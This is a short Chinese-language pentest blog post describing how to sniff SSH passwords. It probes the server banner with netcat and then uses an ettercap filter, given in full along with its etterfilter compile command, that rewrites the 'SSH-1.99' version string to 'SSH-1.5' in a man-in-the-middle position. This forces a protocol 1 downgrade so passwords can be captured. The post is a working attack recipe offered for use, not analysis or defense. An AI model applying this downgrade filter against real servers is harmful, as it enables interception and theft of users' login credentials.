* 作者: xi4oyu(http://www.pentestday.com)
* 转载请注明出处
通常情况下我们判断目标的ssh能否被嗅探可以使用nc来确定。具体方法为nc targetip 22。
如果返回的版本号为SSH-1.99就表示在sshd_config中protcol 为2,1。
但默认从网上下的ettercap是不能嗅探ssh1的密码的,即使被嗅探的服务器被配置成了protcol 2,1也一样。
花了一会研究了下filter的写法,写了个ssh将ssh-1.99降到ssh-1.5的filter
if (tcp.src ==22 && search(DATA.data,"SSH-1.99")){
replace("SSH-1.99","SSH-1.5");
}
保存为sh.filter,编译方式为Etterfilter sh.filter -o sh.ef
启动ettercap的时候加载这个filter,看看,是不是能嗅了?
呵呵
